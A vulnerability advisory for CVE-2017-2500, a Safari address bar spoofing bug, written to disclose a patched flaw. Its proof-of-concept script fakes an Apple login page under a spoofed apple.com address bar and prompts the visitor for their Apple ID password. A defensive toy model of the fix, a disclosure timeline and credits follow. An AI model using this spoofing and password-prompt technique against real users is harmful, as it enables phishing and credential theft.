September 14, 2018

[CVE-2017-2500] Address bar spoofing on macOS Safari

Affected Products

Safari < 10.1.1 on macOS

Description

When we visit a URL with an unusual port, or a hostname that still has a DNS record but can no longer be reached (for example "http://www.apple.com:1234" or "http://access.apple.com"), Safari keeps trying to connect to it. While that navigation is still loading, the address bar already shows the target URL, but the previous page is still rendered and still scriptable, so the address bar can be spoofed during the loading time.

The PoC

<script>
// Replace the current document with attacker-chosen content; this page stays
// visible while the navigation started below is still pending.
function spoof(){
    document.write("<title>Apple login</title><h1>Trust me!This is apple.com!</h1>");

    // Start a navigation that never completes: the host resolves, but nothing
    // answers on port 1234, so Safari keeps "loading" it and the address bar
    // shows the target URL.
    window.location.assign("http://www.apple.com:1234");
    //or you can use the following script:
    //window.location.assign("http://access.apple.com");
}
// Run once immediately, then repeat every 2 seconds (setInterval needs the
// function reference, not the result of calling it).
spoof();
setInterval(spoof, 2000);
setTimeout(function(){
    prompt('Checking your appid password:');
}, 6000);
</script>
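The description and the PoC above both come down to one design question: does the address bar show the URL of the navigation that is merely pending, or only the URL of the document that has actually been committed and rendered? The following toy model is an added illustration written for this page; it is not Safari or WebKit code and does not reproduce Apple's actual fix. The TabModel class, its method names and the attacker origin "https://attacker.example" are all assumptions constructed for the example. It contrasts the vulnerable behaviour (address bar follows the pending URL) with the hardened behaviour (address bar follows the committed document) under the exact scenario from the advisory: a navigation to a host:port that never answers while the old page keeps rewriting its own content.

```javascript
// Toy model of a browser tab's navigation state, added for illustration only.
// Not Safari/WebKit code. Names (TabModel, startNavigation, ...) are assumptions.

class TabModel {
  // showPendingUrl: true models the vulnerable behaviour, false the hardened one.
  constructor({ showPendingUrl }) {
    this.showPendingUrl = showPendingUrl;
    this.committedUrl = "about:blank"; // URL of the document actually rendered
    this.pendingUrl = null;            // navigation started but not yet committed
    this.documentTitle = "";
  }

  // Equivalent of window.location.assign(url): navigation starts, nothing commits.
  startNavigation(url) {
    this.pendingUrl = url;
  }

  // Scripts in the still-rendered document can keep changing what the user sees.
  setTitle(title) {
    this.documentTitle = title;
  }

  // Server answered: the new document replaces the old one.
  commitNavigation() {
    if (this.pendingUrl === null) return;
    this.committedUrl = this.pendingUrl;
    this.pendingUrl = null;
    this.documentTitle = "";
  }

  // Connection refused or timed out: navigation abandoned, old document stays.
  failNavigation() {
    this.pendingUrl = null;
  }

  // What the address bar displays under each policy.
  addressBarUrl() {
    if (this.showPendingUrl && this.pendingUrl !== null) return this.pendingUrl;
    return this.committedUrl;
  }

  // Invariant a UI security review would check: the origin shown in the
  // address bar equals the origin of the document the user is looking at.
  isConsistent() {
    return new URL(this.addressBarUrl()).origin === new URL(this.committedUrl).origin;
  }
}

// Scenario mirroring the advisory (constructed sample data): the attacker page
// starts a navigation that never connects, then rewrites its own content.
function runScenario(showPendingUrl) {
  const tab = new TabModel({ showPendingUrl });
  tab.committedUrl = "https://attacker.example";   // constructed attacker origin
  tab.startNavigation("http://www.apple.com:1234"); // port from the advisory; never answers
  tab.setTitle("Apple login");                      // old document is still scriptable
  const duringLoad = {
    shown: tab.addressBarUrl(),
    title: tab.documentTitle,
    consistent: tab.isConsistent(),
  };
  tab.failNavigation(); // eventually the connection attempt gives up
  return { duringLoad, afterFail: tab.addressBarUrl() };
}

console.log("vulnerable:", JSON.stringify(runScenario(true)));
console.log("hardened:  ", JSON.stringify(runScenario(false)));
```

In the vulnerable model the window of exposure is exactly the time between startNavigation and failNavigation: the bar reads "http://www.apple.com:1234" while the rendered document, and its title, belong to the attacker origin. In the hardened model the invariant checked by isConsistent holds at every step, which is the property a fix for this bug class has to restore.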

Disclosure Timeline

2017/2/7 Vulnerability details provided to Apple via product-security@apple.com

2017/4/26 Apple fixed it in Safari 10.1.1

2017/5/12 CVE-2017-2500 assigned.

Credit

This vulnerability was discovered by Zhiyang Zeng and Yuyang Zhou of Tencent Security Platform Department.